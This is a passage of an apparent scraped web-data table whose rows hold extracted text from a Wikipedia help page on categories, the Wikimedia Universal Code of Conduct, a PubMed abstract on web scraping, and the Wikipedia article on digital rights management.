(e.g. includeonly Category:category name includeonly ). When the template is transcluded into the page, the category link becomes active, and the page is added to the category page. This is useful for categories that have high turnover or many pages included, like cleanup categories. Changes to the template, however, may not be reflected immediately on the category page. When you edit an article to add a category tag directly, the list of category members is updated immediately when the page is saved. When a category link is contained in a template, however, this does not happen immediately: instead, whenever a template is edited, all the pages that transclude it are put into the job queue to be recached during periods of low server load. This means that, in busy periods, it may take hours or even days before individual pages are recached and they start to appear in the category list. Performing a null edit to a page will allow it to jump the queue and be immediately recached. To add the template itself to the category page as well, omit the "includeonly" tags. To add the template to a category without categorizing pages on which the template is transcluded, place the category declaration between noinclude ... noinclude tags, or add it to the template documentation page between includeonly includeonly (the latter allows recategorizing the template without editing it, which is helpful if it is protected, or so complicated that mere mortals hesitate to touch it). Parser functions can be used to make the transcluded categories, or the sort key used in them, dependent on other variables, notably PAGENAME. On Wikipedia it is not recommended that templates be used to populate ordinary content categories of articles. See Categorization using templates in the categorization guideline. Redirect pages can be categorized and there are conventions on how to do it. The redirect link must be first on the page. On a category page, redirects are listed in italics. For a category, the "Related Changes" feature, when applied to the corresponding category page, lists recent changes to the pages which are currently listed as belonging to a category. Where those pages are subcategories or image pages, only changes to their editable parts are listed. Notice that "Related Changes" does not show edits to pages that have been removed from the category. Also, "Related Changes" does not list recent changes to pages linked from the editable part of the category page (as it would normally, with a non-category page). If a workaround would be required, the links in question could be placed in a template and transcluded onto the category page. As usual unlike with watchlists recent changes to corresponding talk pages are not shown under "Related Changes". Pages one is watching are bolded on the list. This can help to find which pages in a given category one has on one's watchlist. The DynamicPageList (third-party) extension provides a list of last edits to the pages in a category, or optionally, just the list of pages; the simpler DynamicPageList (Wikimedia) is installed on Meta, Wikinews, Wikibooks and Wikiversity; the extension mw:Extension:DPLforum is installed on Wikia. Since 2016, additions and removals from categories are available via the "Category changes" filter on recent changes pages, including watchlists and Special:RecentChangesLinked. For example, category changes to articles in Category:Cannabis stubs can be found here. You can monitor additions and removals from specific categories by adding the categories to your watchlist and making sure the "Category changes" filter is active. You can view changes to categories in your watchlist by clicking here. Additional scripts with similar functionality are User:CategoryWatchlistBot and User:Ais523 catwatch. |
17 | https://en.wikipedia.org/wiki/Web_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conduct | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project.Per resolution by the Foundation's Board, the Universal Code of Conduct (UCoC) applies to all Wikimedia projects and spaces as well as Foundation activities, including events it hosts and events it funds or supports with other resources. We believe in empowering as many people as possible to actively participate in Wikimedia projects and spaces, to reach our vision of a world in which everyone can share in the sum of all human knowledge. We believe our communities of contributors should be as diverse, inclusive, and accessible as possible. We want these communities to be positive, safe and healthy environments for anyone who joins (and wants to join) them. We are committed to ensuring that it remains so, including by embracing this Code of Conduct and revisiting for updates as needed. Also, we wish to protect our projects against those who damage or distort the content. In line with the Wikimedia mission, all who participate in Wikimedia projects and spaces will: This Universal Code of Conduct (UCoC) defines a minimum set of guidelines of expected and unacceptable behaviour. It applies to everyone who interacts and contributes to online and offline Wikimedia projects and spaces. This includes new and experienced contributors, functionaries within the projects, event organizers and participants, employees and board members of affiliates and employees and board members of the Wikimedia Foundation. It applies to all Wikimedia projects, technical spaces, in-person and virtual events, as well as the following instances: The Universal Code of Conduct provides a baseline of behaviour for collaboration on Wikimedia projects worldwide. Communities may add to this to develop policies that take account of local and cultural context, while maintaining the criteria listed here as a minimum standard. The Universal Code of Conduct applies equally to all Wikimedians without any exceptions. Actions that contradict the Universal Code of Conduct can result in sanctions. These may be imposed by designated functionaries (as appropriate in their local context) and or by the Wikimedia Foundation as the legal owner of the platforms. Every Wikimedian, whether they are a new or experienced editor, a community functionary, an affiliate or Wikimedia Foundation board member or employee, is responsible for their own behaviour. In all Wikimedia projects, spaces and events, behaviour will be founded in respect, civility, collegiality, solidarity and good citizenship. This applies to all contributors and participants in their interaction with all contributors and participants, without exceptions based on age, mental or physical disabilities, physical appearance, national, religious, ethnic and cultural background, caste, social class, language fluency, sexual orientation, gender identity, sex or career field. Nor will we make exceptions based on standing, skills or accomplishments in the Wikimedia projects or movement. We expect all Wikimedians to show respect for others. In communicating with people, whether in online or offline Wikimedia environments, we will treat each other with mutual respect. This includes but is not limited to: We strive towards the following behaviours: This includes but is not limited to: The Universal Code of Conduct aims to help community members identify situations of bad behaviour. The following behaviours are considered unacceptable within the Wikimedia movement: This includes any behaviour intended primarily to intimidate, outrage or upset a person, or any behaviour where this would reasonably be considered the most likely main outcome. Behaviour can be considered harassment if it is beyond what a reasonable person would be expected to tolerate in a global, intercultural environment. Harassment often takes the form of emotional abuse, especially towards people who are in a vulnerable position, and may include contacting workplaces or friends and family members in an effort to intimidate or embarrass. In some cases, behaviour that would not rise to the level of harassment in a single case can become harassment through repetition. Harassment includes but is not limited to: Abuse occurs when someone in a real or perceived position of power, privilege, or influence engages in disrespectful, cruel, and or violent behaviour towards other people. In Wikimedia environments, it may take the form of verbal or psychological abuse and may overlap with harassment. Deliberately introducing biased, false, inaccurate or inappropriate content, or hindering, impeding or otherwise hampering the creation (and or maintenance) of content. This includes but is not limited to: |
18 | https://en.wikipedia.org/wiki/Data_scraping | https://pubmed.ncbi.nlm.nih.gov/23632294 | An official website of the United States government The .gov means it’s official. Federal government websites often end in .gov or .mil. Before sharing sensitive information, make sure you’re on a federal government site. The site is secure. The https: ensures that you are connecting to the official website and that any information you provide is encrypted and transmitted securely. Web services are the de facto standard in biomedical data integration. However, there are data integration scenarios that cannot be fully covered by Web services. A number of Web databases and tools do not support Web services, and existing Web services do not cover for all possible user data demands. As a consequence, Web data scraping, one of the oldest techniques for extracting Web contents, is still in position to offer a valid and valuable service to a wide range of bioinformatics applications, ranging from simple extraction robots to online meta-servers. This article reviews existing scraping frameworks and tools, identifying their strengths and limitations in terms of extraction capabilities. The main focus is set on showing how straightforward it is today to set up a data scraping pipeline, with minimal programming effort, and answer a number of practical needs. For exemplification purposes, we introduce a biomedical data extraction scenario where the desired data sources, well-known in clinical microbiology and similar domains, do not offer programmatic interfaces yet. Moreover, we describe the operation of WhichGenes and PathJam, two bioinformatics meta-servers that use scraping as means to cope with gene set enrichment analysis. Keywords: Web scraping; data integration; database interfaces; interoperability. The Author 2013. Published by Oxford University Press. For Permissions, please email: journals.permissions oup.com. PubMed Disclaimer NCBI Literature Resources MeSH PMC Bookshelf Disclaimer The PubMed wordmark and PubMed logo are registered trademarks of the U.S. Department of Health and Human Services (HHS). Unauthorized use of these marks is strictly prohibited. Connect with NLM National Library of Medicine 8600 Rockville Pike Bethesda, MD 20894 Web Policies FOIA HHS Vulnerability Disclosure Help Accessibility Careers |
19 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Digital_rights_management | Digital rights management (DRM) is the management of legal access to digital content. Various tools or technological protection measures (TPM), 1 such as access control technologies, can restrict the use of proprietary hardware and copyrighted works. 2 DRM technologies govern the use, modification and distribution of copyrighted works (e.g. software, multimedia content) and of systems that enforce these policies within devices. 3 DRM technologies include licensing agreements 4 and encryption. 5 Laws in many countries criminalize the circumvention of DRM, communication about such circumvention, and the creation and distribution of tools used for such circumvention. Such laws are part of the United States' Digital Millennium Copyright Act (DMCA), 6 and the European Union's Information Society Directive 7 with the French DADVSI an example of a member state of the European Union implementing that directive. 8 Copyright holders argue that DRM technologies are necessary to protect intellectual property, just as physical locks prevent personal property from theft. 1 For examples, they can help the copyright holders for maintaining artistic controls, 9 and supporting licenses' modalities such as rentals. 10 Industrial users (i.e. industries) have expanded the use of DRM technologies to various hardware products, such as Keurig's coffeemakers, 11 12 Philips' light bulbs, 13 14 mobile device power chargers, 15 16 17 and John Deere's tractors. 18 For instance, tractor companies try to prevent farmers from making repairs via DRM. 19 20 DRM is controversial. There is an absence of evidence about the DRM capability in preventing copyright infringement, some complaints by legitimate customers for caused inconveniences, and a suspicion of stifling innovation and competition. 21 Furthermore, works can become permanently inaccessible if the DRM scheme changes or if a required service is discontinued. 22 DRM technologies have been criticized for restricting individuals from copying or using the content legally, such as by fair use or by making backup copies. DRM is in common use by the entertainment industry (e.g., audio and video publishers). 23 Many online stores such as OverDrive use DRM technologies, as do cable and satellite service operators. Apple removed DRM technology from iTunes around 2009. 24 Typical DRM also prevents lending materials out through a library, or accessing works in the public domain. 1 The rise of digital media and analog-to-digital conversion technologies has increased the concerns of copyright-owners, particularly within the music and video industries. While analog media inevitably lose quality with each copy generation and during normal use, digital media files may be duplicated without limit with no degradation. Digital devices make it convenient for consumers to convert (rip) media originally in a physical, analog or broadcast form into a digital form for portability or later use. Combined with the Internet and file-sharing tools, made unauthorized distribution of copyrighted content (digital piracy) much easier. DRM became a major concern with the growth of the Internet in the 1990s, as piracy crushed CD sales and online video became popular. It peaked in the early 2000s as various countries attempted to respond with legislation and regulations and dissipated in the 2010s as social media and streaming services largely replaced piracy and content providers elaborated next-generation business models. In 1983, the Software Service System (SSS) devised by the Japanese engineer Ryuichi Moriya was the first example of DRM technology. It was subsequently refined under the name superdistribution. The SSS was based on encryption, with specialized hardware that controlled decryption and enabled payments to be sent to the copyright holder. The underlying principle was that the physical distribution of encrypted digital products should be completely unrestricted and that users of those products would be encouraged to do so. 25 An early DRM protection method for computer and Nintendo Entertainment System games was when the game would pause and prompt the player to look up a certain page in a booklet or manual that came with the game; if the player lacked access to the material, they would not be able to continue. An early example of a DRM system is the Content Scramble System (CSS) employed by the DVD Forum on DVD movies. CSS uses an encryption algorithm to encrypt content on the DVD disc. Manufacturers of DVD players must license this technology and implement it in their devices so that they can decrypt the content. The CSS license agreement includes restrictions on how the DVD content is played, including what outputs are permitted and how such permitted outputs are made available. This keeps the encryption intact as the content is displayed. citation needed In May 1998, the Digital Millennium Copyright Act (DMCA) passed as an amendment to US copyright law. It had controversial (possibly unintended) implications. Russian programmer Dmitry Sklyarov was arrested for alleged DMCA infringement after a presentation at DEF CON. The DMCA has been cited as chilling to legitimate users; 26 such as security consultants including Niels Ferguson, who declined to publish vulnerabilities he discovered in Intel's secure-computing scheme due to fear of arrest under DMCA; and blind or visually impaired users of screen readers or other assistive technologies. 27 In 1999, Jon Lech Johansen released DeCSS, which allowed a CSS-encrypted DVD to play on a computer running Linux, at a time when no compliant DVD player for Linux had yet been created. The legality of DeCSS is questionable: one of its authors was sued, and reproduction of the keys themselves is subject to restrictions as illegal numbers. 28 More modern examples include ADEPT, FairPlay, Advanced Access Content System. The World Intellectual Property Organization Copyright Treaty (WCT) was passed in 1996. The US Digital Millennium Copyright Act (DMCA), was passed in 1998. The European Union enacted the Information Society Directive. In 2006, the lower house of the French parliament adopted such legislation as part of the controversial DADVSI law, but added that protected DRM techniques should be made interoperable, a move which caused widespread controversy in the United States. The Tribunal de grande instance de Paris concluded in 2006, that the complete blocking of any possibilities of making private copies was an impermissible behaviour under French copyright law. The broadcast flag concept was developed by Fox Broadcasting in 2001, and was supported by the MPAA and the U.S. Federal Communications Commission (FCC). A ruling in May 2005 by a United States courts of appeals held that the FCC lacked authority to impose it on the US TV industry. It required that all HDTVs obey a stream specification determining whether a stream can be recorded. This could block instances of fair use, such as time-shifting. It achieved more success elsewhere when it was adopted by the Digital Video Broadcasting Project (DVB), a consortium of about 250 broadcasters, manufacturers, network operators, software developers, and regulatory bodies from about 35 countries involved in attempting to develop new digital TV standards. In January 2001, the Workshop on Digital Rights Management of the World Wide Web Consortium was held. 29 On 22 May 2001, the European Union passed the Information Society Directive, with copyright protections. In 2003, the European Committee for Standardization Information Society Standardization System (CEN ISSS) DRM Report was published. 30 In 2004, the Consultation process of the European Commission, and the DG Internal Market, on the Communication COM(2004)261 by the European Commission on "Management of Copyright and Related Rights" closed. 31 In 2005, DRM Workshops of Directorate-General for Information Society and Media (European Commission), and the work of the High Level Group on DRM were held. 32 In 2005, Sony BMG installed DRM software on users' computers without clearly notifying the user or requiring confirmation. Among other things, the software included a rootkit, which created a security vulnerability. When the nature of the software was made public much later, Sony BMG initially minimized the significance of the vulnerabilities, but eventually recalled millions of CDs, and made several attempts to patch the software to remove the rootkit. Class action lawsuits were filed, which were ultimately settled by agreements to provide affected consumers with a cash payout or album downloads free of DRM. 33 Microsoft's media player Zune released in 2006 did not support content that used Microsoft's PlaysForSure DRM scheme. 34 Windows Media DRM, reads instructions from media files in a rights management language that states what the user may do with the media. 35 Later versions of Windows Media DRM implemented music subscription services that make downloaded files unplayable after subscriptions are cancelled, along with the ability for a regional lockout. 36 Tools like FairUse4WM strip Windows Media of DRM restrictions. 37 The Gowers Review of Intellectual Property by the British Government from Andrew Gowers was published in 2006 with recommendations regarding copyright terms, exceptions, orphaned works, and copyright enforcement. DVB (DVB-CPCM) is an updated variant of the broadcast flag. The technical specification was submitted to European governments in March 2007. As with much DRM, the CPCM system is intended to control use of copyrighted material by the end-user, at the direction of the copyright holder. According to Ren Bucholz of the Electronic Frontier Foundation (EFF), "You won't even know ahead of time whether and how you will be able to record and make use of particular programs or devices". 38 The normative sections were approved for publication by the DVB Steering Board, and formalized by ETSI as a formal European Standard (TS 102 825 X) where X refers to the Part number. Nobody has yet stepped forward to provide a Compliance and Robustness regime for the standard, so it is not presently possible to fully implement a system, as no supplier of device certificates has emerged. In December 2006, the industrial-grade Advanced Access Content System (AACS) for HD DVD and Blu-ray Discs, a process key was published by hackers, which enabled unrestricted access to AACS-protected content. 39 40 In January 2007, EMI stopped publishing audio CDs with DRM, stating that "the costs of DRM do not measure up to the results. 41 In March, Musicload.de, one of Europe's largest internet music retailers, announced their position strongly against DRM. In an open letter, Musicload stated that three out of every four calls to their customer support phone service are as a result of consumer frustration with DRM. 42 Apple Inc. made music DRM-free after April 2007 43 and labeled all music as "DRM-Free" after 2008. 44 Other works sold on iTunes such as apps, audiobooks, movies, and TV shows are protected by DRM. 45 A notable DRM failure happened in November 2007, when videos purchased from Major League Baseball prior to 2006 became unplayable due to a change to the servers that validate the licenses. 46 In 2007, the European Parliament supported the EU's direction on copyright protection. Asus released a soundcard which features a function called "Analog Loopback Transformation" to bypass the restrictions of DRM. This feature allows the user to record DRM-restricted audio via the soundcard's built-in analog I O connection. 47 48 Digital distributor GOG.com (formerly Good Old Games) specializes in PC video games and has a strict non-DRM policy. 49 Baen Books and O'Reilly Media, dropped DRM prior to 2012, when Tor Books, a major publisher of science fiction and fantasy books, first sold DRM-free e-books. 50 The Axmedis project completed in 2008. It was a European Commission Integrated Project of the FP6, has as its main goal automating content production, copy protection, and distribution, to reduce the related costs, and to support DRM at both B2B and B2C areas, harmonizing them. The INDICARE project was a dialogue on consumer acceptability of DRM solutions in Europe that completed in 2008. In mid 2008, the Windows version of Mass Effect marked the start of a wave of titles primarily making use of SecuROM for DRM and requiring authentication with a server. The use of the DRM scheme in 2008's Spore led to protests, resulting in searches for an unlicensed version. This backlash against the activation limit led Spore to become the most pirated game in 2008, topping the top 10 list compiled by TorrentFreak. 51 52 However, Tweakguides concluded that DRM does not appear to increase video game piracy, noting that other games on the list, such as Call of Duty 4 and Assassin's Creed, use DRM without limits or online activation. Additionally, other video games that use DRM, such as BioShock, Crysis Warhead, and Mass Effect, do not appear on the list. 53 Many mainstream publishers continued to rely on online DRM throughout the later half of 2008 and early 2009, including Electronic Arts, Ubisoft, Valve, and Atari, The Sims 3 being a notable exception in the case of Electronic Arts. 54 Ubisoft broke with the tendency to use online DRM in late 2008, with the release of Prince of Persia as an experiment to "see how truthful people really are" regarding the claim that DRM was inciting people to use illegal copies. 55 Although Ubisoft has not commented on the results of the "experiment", Tweakguides noted that two torrents on Mininova had over 23,000 people downloading the game within 24 hours of its release. 56 In 2009, Amazon remotely deleted purchased copies of George Orwell's Animal Farm (1945) and Nineteen Eighty-Four (1949) from customers' Amazon Kindles after refunding the purchase price. 57 Commentators described these actions as Orwellian and compared Amazon to Big Brother from Nineteen Eighty-Four. 58 59 60 61 Amazon CEO Jeff Bezos then issued a public apology. FSF wrote that this was an example of the excessive power Amazon has to remotely censor content, and called upon Amazon to drop DRM. 62 Amazon then revealed the reason behind its deletion: the e-books in question were unauthorized reproductions of Orwell's works, which were not within the public domain and that the company that published and sold on Amazon's service had no right to do so. 63 Ubisoft formally announced a return to online authentication on 9 February 2010, through its Uplay online game platform, starting with Silent Hunter 5, The Settlers 7, and Assassin's Creed II. 64 Silent Hunter 5 was first reported to have been compromised within 24 hours of release, 65 but users of the cracked version soon found out that only early parts of the game were playable. 66 The Uplay system works by having the installed game on the local PCs incomplete and then continuously downloading parts of the game code from Ubisoft's servers as the game progresses. 67 It was more than a month after the PC release in the first week of April that software was released that could bypass Ubisoft's DRM in Assassin's Creed II. The software did this by emulating a Ubisoft server for the game. Later that month, a real crack was released that was able to remove the connection requirement altogether. 68 69 In March 2010, Uplay servers suffered a period of inaccessibility due to a large-scale DDoS attack, causing around 5% of game owners to become locked out of playing their game. 70 The company later credited owners of the affected games with a free download, and there has been no further downtime. 71 In 2011, comedian Louis C.K. released his concert film Live at the Beacon Theater as an inexpensive (US$5), DRM-free download. The only attempt to deter unlicensed copies was a letter emphasizing the lack of corporate involvement and direct relationship between artist and viewer. The film was a commercial success, turning a profit within 12 hours of its release. The artist suggested that piracy rates were lower than normal as a result, making the release an important case study for the digital marketplace. 72 73 74 In 2012, the EU Court of Justice ruled in favor of reselling copyrighted games. 75 In 2012, India implemented digital rights management protection. 76 77 78 79 In 2012, webcomic Diesel Sweeties released a DRM-free PDF e-book. 80 81 82 He followed this with a DRM-free iBook specifically for the iPad 83 that generated more than 10,000 downloads in three days. 84 That led Stevens to launch a Kickstarter project "ebook stravaganza 3000" to fund the conversion of 3,000 comics, written over 12 years, into a single "humongous" e-book to be released both for free and through the iBookstore; launched 8 February 2012, with the goal of raising $3,000 in 30 days. The "payment optional" DRM-free model in this case was adopted on Stevens' view that "there is a class of webcomics reader who would prefer to read in large chunks and, even better, would be willing to spend a little money on it. 84 In February 2012, Double Fine asked for crowdfunding for an upcoming video game, Double Fine Adventure, on Kickstarter and offered the game DRM-free for backers. This project exceeded its original goal of $400,000 in 45 days, raising in excess of $2 million. 85 Crowdfunding acted as a pre-order or alternatively as a subscription. After the success of Double Fine Adventure, many games were crowd-funded and many offered a DRM-free version. 86 87 88 Websites such as library.nu (shut down by court order on 15 February 2012), BookFi, BookFinder, Library Genesis, and Sci-Hub allowed e-book downloading by violating copyright. 89 90 91 92 As of 2013, other developers, such as Blizzard Entertainment put most of the game logic is on the "side" or taken care of by the servers of the game maker. Blizzard uses this strategy for its game Diablo III and Electronic Arts used this same strategy with their reboot of SimCity, the necessity of which has been questioned. 93 In 2014, the EU Court of Justice ruled that circumventing DRM on game devices was legal under some circumstances. 94 95 In 2014, digital comic distributor Comixology allowed rights holders to provide the option of DRM-free downloads. Publishers that allow this include Dynamite Entertainment, Image Comics, Thrillbent, Top Shelf Productions, and Zenescope Entertainment. 96 In February 2022, Comixology, which was later under the ownership of Amazon, ended the option of downloading DRM-free downloads on all comics, although any comics previously purchased prior to the date will have the option to download comics without DRM. 97 98 A product key, typically an alphanumerical string, can represent a license to a particular copy of software. During the installation process or software launch, the user is asked to enter the key; if the key is valid (typically via internal algorithms), the key is accepted, and the user can continue. Product keys can be combined with other DRM practices (such as online "activation"), to prevent cracking the software to run without a product key, or using a keygen to generate acceptable keys. DRM can limit the number of devices on which a legal user can install content. This restriction typically support 3 5 devices. This affects users who have more devices than the limit. Some allow one device to be replaced with another. Without this software and hardware upgrades may require an additional purchase. Always-on DRM checks and rechecks authorization while the content is in use by interacting with a server operated by the copyright holder. In some cases, only part of the content is actually installed, while the rest is downloaded dynamically during use. Encryption alters content in a way that means that it cannot be used without first decrypting it. Encryption can ensure that other restriction measures cannot be bypassed by modifying software, so DRM systems typically rely on encryption in addition to other techniques. Microsoft PlayReady prevents illicit copying of multimedia and other files. 99 Restrictions can be applied to electronic books and documents, in order to prevent copying, printing, forwarding, and creating backup copies. This is common for both e-publishers and enterprise Information Rights Management. It typically integrates with content management system software. 100 While some commentators claim that DRM complicates e-book publishing, 101 it has been used by organizations such as the British Library in its secure electronic delivery service to permit worldwide access to rare documents which, for legal reasons, were previously only available to authorized individuals actually visiting the Library's document centre. 102 103 104 Four main e-book DRM schemes are in common use, from Adobe, Amazon, Apple, and the Marlin Trust Management Organization (MTMO). Windows Vista contains a DRM system called Protected Media Path, which contains Protected Video Path (PVP). 106 PVP tries to stop DRM-restricted content from playing while unsigned software is running, in order to prevent the unsigned software from accessing the content. Additionally, PVP can encrypt information during transmission to the monitor or the graphics card, which makes it more difficult to make unauthorized recordings. Bohemia Interactive have used a form of technology since Operation Flashpoint: Cold War Crisis, wherein if the game copy is suspected of being unauthorized, annoyances like guns losing their accuracy or the players turning into a bird are introduced. 107 Croteam's Serious Sam 3: BFE causes a special invincible foe in the game to appear and constantly attack the player until they are killed. 108 109 Regional lockout (or region coding) prevents the use of a certain product or service, except in a specific region or territory. Lockout may be enforced through physical means, through technological means such as inspecting the user's IP address or using an identifying code, or through unintentional means introduced by devices that support only region-specific technologies (such as video formats, i.e., NTSC and PAL). Digital watermarks can be steganographically embedded within audio or video data. They can be used for recording the copyright owner, the distribution chain or identifying the purchaser. They are not complete DRM mechanisms in their own right, but are used as part of a system for copyright enforcement, such as helping provide evidence for legal purposes, rather than enforcing restrictions. 110 Some audio video editing programs may distort, delete, or otherwise interfere with watermarks. Signal modulator-carrier chromatography may separate watermarks from the recording or detect them as glitches. Additionally, comparison of two separately obtained copies of audio using basic algorithms can reveal watermarks. citation needed Sometimes, metadata is included in purchased media which records information such as the purchaser's name, account information, or email address. Also included may be the file's publisher, author, creation date, download date, and various notes. This information is not embedded in the content, as a watermark is. It is kept separate from the content, but within the file or stream. As an example, metadata is used in media purchased from iTunes for DRM-free as well as DRM-restricted content. This information is included as MPEG standard metadata. 111 112 US Cable television set-top boxes require a specific piece of hardware to operate. The CableCard standard is used to restrict content to services to which the customer is subscribed. Content has an embedded broadcast flag that the card examines to decide whether the content can be viewed by a specific user. In addition, platforms such as Steam may include DRM mechanisms. Most of the mechanisms above are copy protection mechanisms rather than DRM mechanisms per se. The World Intellectual Property Organization supports the World Intellectual Property Organization Copyright Treaty (WCT) which requires nations to enact laws against DRM circumvention. The WIPO Internet Treaties do not mandate criminal sanctions, merely requiring "effective legal remedies". 113 China's Interim Regulations ostensibly regulate digital content. China claims to protect intellectual property rights, although the World Trade Organization (WTO) "determined that China's copyright laws do not provide the same efficacy to non-Chinese nationals as they do to Chinese citizens, as required by the Berne Convention" and that "China's copyright laws do not provide enforcement procedures so as to permit effective action against any act of infringement of intellectual property rights". 114 The EU operates under its Information Society Directive, its WIPO implementation. The European Parliament then directed member states to outlaw violation of international copyright for commercial purposes. Punishments range from fines to imprisonment. It excluded patent rights and copying for personal, non-commercial purposes. Copyrighted games can be resold. 75 Circumventing DRM on game devices is legal under some circumstances; protections cover only technological measures the interfere with prohibited actions. 94 95 India is not a signatory to WIPO Copyright Treaty or the WIPO Performances and Phonograms Treaty. 115 Its Copyright Act provides protections for digital content, criminalizing circumvention of technical protections and distribution of illicit copies. Punishment includes prison time. Fair use is not explicitly addressed. 76 77 78 Israel is not a signatory to the WIPO Copyright Treaty. Israeli law does not expressly prohibit the circumvention of technological protection measures. 116 Pakistan is not a signatory to the WIPO Copyright Treaty or the WIPO Performances and Phonograms Treaty. Pakistani law does not criminalize the circumvention of technological protection measures. 117 As of January 2022, Pakistan's Intellectual Property Office intended to accede to the WIPO Copyright Treaty and WIPO Performances and Phonograms Treaty. However, there has been no major progress for Pakistan to accede to the treaties, 118 and the timeline of the enactments of amendments to the Copyright Ordinance is unclear. 119 As of February 2023, Pakistan's Intellectual Property Office was currently finalizing draft amendments to its Copyright Ordinance. 120 US protections are governed by the Digital Millennium Copyright Act (DMCA). It criminalizes the production and dissemination of technology that lets users circumvent copy-restrictions. Reverse engineering is expressly permitted, providing a safe harbor where circumvention is necessary to interoperate with other software. Open-source software that decrypts protected content is not prohibited per se. Decryption done for the purpose of achieving interoperability of open source operating systems with proprietary systems is protected. Dissemination of such software for the purpose of violating or encouraging others to violate copyrights is prohibited. DMCA has been largely ineffective. 121 Cirumvention software is widely available. However, those who wish to preserve the DRM systems have attempted to use the Act to restrict the distribution and development of such software, as in the case of DeCSS. DMCA contains an exception for research, although the exception is subject to qualifiers that created uncertainty in that community. Cryptanalytic research may violate the DMCA, although this is unresolved. DRM faces widespread opposition. John Walker 122 and Richard Stallman are notable critics. 123 124 Stallman has claimed that using the word "rights" is misleading and suggests that the word "restrictions", as in "Digital Restrictions Management", replace it. 125 This terminology has been adopted by other writers and critics. 126 127 128 Other prominent critics include Ross Anderson, who heads a British organization that opposes DRM and similar efforts in the UK and elsewhere, and Cory Doctorow. 129 EFF and organizations such as FreeCulture.org are opposed to DRM. 130 The Foundation for a Free Information Infrastructure criticized DRM's effect as a trade barrier from a free market perspective. 131 Bruce Schneier argues that digital copy prevention is futile: "What the entertainment industry is trying to do is to use technology to contradict that natural law. They want a practical way to make copying hard enough to save their existing business. But they are doomed to fail. 132 He described trying to make digital files uncopyable as like "trying to make water not wet". 133 The creators of StarForce stated that "The purpose of copy protection is not making the game uncrackable it is impossible. 134 Bill Gates spoke about DRM at 2006 CES, saying that DRM causes problems for legitimate consumers. 135 The Norwegian consumer rights organization "Forbrukerr det" complained to Apple in 2007 about the company's use of DRM, accusing it of unlawfully restricting users' access to their music and videos, and of using EULAs that conflict with Norwegian consumer legislation. The complaint was supported by consumers' ombudsmen in Sweden and Denmark, and was reviewed in the EU in 2014. The United States Federal Trade Commission held hearings in March 2009, to review disclosure of DRM limitations to customers' use of media products. 136 Valve president Gabe Newell stated, "most DRM strategies are just dumb" because they only decrease the value of a game in the consumer's eyes. Newell suggested that the goal should instead be creating greater value for customers through service value". Valve operates Steam, an online store for PC games, as well as a social networking service and a DRM platform. 137 At the 2012 Game Developers Conference, the CEO of CD Projekt Red, Marcin Iwinski, announced that the company would not use DRM. Iwinski stated of DRM, "It's just over-complicating things... the game... is cracked in two hours. Iwinski added "DRM does not protect your game. If there are examples that it does, then people maybe should consider it, but then there are complications with legit users. 138 The Association for Computing Machinery and the Institute of Electrical and Electronics Engineers opposed DRM, naming AACS as a technology "most likely to fail" in an issue of IEEE Spectrum. 139 The GNU General Public License version 3, as released by the Free Software Foundation, has a provision that "strips" DRM of its legal value, so people can break the DRM on GPL software without breaking laws such as the DMCA. In May 2006, FSF launched a "Defective by Design" campaign against DRM. 140 141 Creative Commons provides licensing options that encourage creators to work without the use of DRM. 142 Creative Commons licenses have anti-DRM clauses, making the use of DRM by a licensee a breach of the licenses' Baseline Rights. 143 Many publishers and artists label their works "DRM-free". Major companies that have done so include Apple, GOG.com, Tor Books and Vimeo on Demand. Comixology once had DRM-free works available for sale until 2022 when its parent company, Amazon, removed the option to buy DRM-free works as part of their migration to Amazon's website, although previous purchases remained DRM-free. 144 Many DRM systems require online authentication. Whenever the server goes down, or a territory experiences an Internet outage, it locks out people from registering or using the material. 145 This is especially true for products that require a persistent online connection, where, for example, a successful DDoS attack on the server essentially makes the material unusable. Compact discs (CDs) with DRM schemes are not standards-compliant, and are labeled CD-ROMs. CD-ROMs cannot be played on all CD players or personal computers. 146 Certain DRM systems have been associated with reduced performance: some games implementing Denuvo Anti-Tamper performed better without DRM. 147 148 However, in March 2018, PC Gamer tested Final Fantasy XV for the performance effects of Denuvo, which was found to cause no negative gameplay impact despite a little increase in loading time. 149 DRM copy-prevention schemes can never be wholly secure since the logic needed to decrypt the content is present either in software or hardware and implicitly can be hacked. An attacker can extract this information, decrypt and copy the content, bypassing the DRM. 129 Satellite and cable systems distribute their content widely and rely on hardware DRM systems. Such systems can be hacked by reverse engineering the protection scheme. Audio and visual material (excluding interactive materials, e.g., video games) are subject to the analog hole, namely that in order to view the material, the digital signal must be turned into an analog signal. Post-conversion, the material can be then be copied and reconverted to a digital format. The analog hole cannot be filled without externally imposed restrictions, such as legal regulations, because the vulnerability is inherent to all analog presentation. 150 The conversion from digital to analog and back reduces recording quality. The HDCP attempt to plug the analog hole was largely ineffective. 151 152 DRM opponents argue that it violates private property rights and restricts a range of normal and legal user activities. A DRM component such as that found on a digital audio player restricts how it acts with regard to certain content, overriding user's wishes (for example, preventing the user from copying a copyrighted song to CD as part of a compilation). Doctorow described this as "the right to make up your own copyright laws". 153 Windows Vista disabled or degraded content play that used a Protected Media Path. 154 DRM restricts the right to make personal copies, provisions lend copies to friends, provisions for service discontinuance, hardware agnosticism, software and operating system agnosticism, 155 lending library use, customer protections against contract amendments by the publisher, and whether content can pass to the owner's heirs. 156 When standards and formats change, DRM-restricted content may become obsolete. When a company undergoes business changes or bankruptcy, its previous services may become unavailable. Examples include MSN Music, 157 Yahoo Music Store, 158 Adobe Content Server 3 for Adobe PDF, 159 and Acetrax Video on Demand. 160 DRM laws are widely flouted: according to Australia Official Music Chart Survey, copyright infringements from all causes are practised by millions of people. 161 According to the EFF, "in an effort to attract customers, these music services try to obscure the restrictions they impose on you with clever marketing. 162 Jeff Raikes, ex-president of the Microsoft Business Division, stated: "If they're going to pirate somebody, we want it to be us rather than somebody else". 163 An analogous argument was made in an early paper by Kathleen Conner and Richard Rummelt. 164 A subsequent study of digital rights management for e-books by Gal Oestreicher-Singer and Arun Sundararajan showed that relaxing some forms of DRM can be beneficial to rights holders because the losses from piracy are outweighed by the increase in value to legal buyers. Even if DRM were unbreakable, pirates still might not be willing to purchase, so sales might not increase. 165 Piracy can be beneficial to some content providers by increase consumer awareness, spreading and popularizing content. This can also increase revenues via other media, such as live performances. Mathematical models suggest that DRM schemes can fail to do their job on multiple levels. 166 The biggest failure is that the burden that DRM poses on a legitimate customer reduces the customer's willingness to buy. An ideal DRM would not inconvenience legal buyers. The 